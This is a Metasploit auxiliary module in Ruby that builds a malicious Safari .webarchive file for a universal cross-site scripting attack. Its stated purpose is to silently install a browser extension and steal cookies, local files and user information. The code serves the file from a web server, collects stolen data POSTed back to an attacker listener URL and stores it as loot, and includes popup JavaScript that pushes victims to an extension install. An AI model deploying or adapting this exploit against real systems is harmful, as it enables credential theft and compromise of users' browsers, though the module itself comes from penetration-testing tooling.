1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'uri'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::FILEFORMAT
10
  include Msf::Exploit::Remote::HttpServer::HTML
11
  include Msf::Exploit::Format::Webarchive
12
  include Msf::Auxiliary::Report
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
19
        'Description' => %q{
20
          Generates a .webarchive file for Mac OS X Safari that will attempt to
21
          inject cross-domain Javascript (UXSS), silently install a browser
22
          extension, collect user information, steal the cookie database,
23
          and steal arbitrary local files.
24

25
          When opened on the target machine the webarchive file must not have the
26
          quarantine attribute set, as this forces the webarchive to execute in a
27
          sandbox.
28
        },
29
        'License' => MSF_LICENSE,
30
        'Author' => 'joev',
31
        'References' => [
32
          ['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
33
        ],
34
        'DisclosureDate' => '2013-02-22',
35
        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
36
        'PassiveActions' => [ 'WebServer' ],
37
        'DefaultAction' => 'WebServer',
38
        'Notes' => {
39
          'Reliability' => UNKNOWN_RELIABILITY,
40
          'Stability' => UNKNOWN_STABILITY,
41
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
42
        }
43
      )
44
    )
45
  end
46

47
  def run
48
    if datastore["URIPATH"].blank?
49
      datastore["URIPATH"] = "/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
50
    end
51

52
    print_status("Creating '#{datastore['FILENAME']}' file...")
53
    file_create(webarchive_xml)
54
    exploit
55
  end
56

57
  def on_request_uri(cli, request)
58
    if request.method =~ /post/i
59
      data_str = request.body.to_s
60
      begin
61
        data = JSON::parse(data_str || '')
62
        file = record_data(data, cli)
63
        send_response_html(cli, '')
64
        print_good "#{data_str.length} chars received and stored to #{file}"
65
      rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
66
        file = record_data(data_str, cli)
67
        print_error "Invalid JSON stored in #{file}"
68
        send_response_html(cli, '')
69
      end
70
    else
71
      send_response(cli, webarchive_xml, {
72
        'Content-Type' => 'application/x-webarchive',
73
        'Content-Disposition' => "attachment; filename=\"#{datastore['FILENAME']}\""
74
      })
75
    end
76
  end
77

78
  # @param [Hash] data the data to store in the log
79
  # @return [String] filename where we are storing the data
80
  def record_data(data, cli)
81
    if data.is_a? Hash
82
      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')
83
    end
84
    store_loot(
85
      file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
86
    )
87
  end
88

89
  # @return [String] formatted http/https URL of the listener
90
  def backend_url
91
    proto = (datastore["SSL"] ? "https" : "http")
92
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
93
    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
94
    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
95
  end
96

97
  def message
98
    super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')
99
  end
100

101
  def popup_js
102
    wrap_with_script do
103
      %Q|
104
        window.onclick = function() {
105
          window.open('data:text/html,<script>opener.postMessage("EXT", "*");window.location="#{apple_extension_url}";<\\/script>');
106
        };
107
      |
108
    end
109
  end
110

111
end
112

113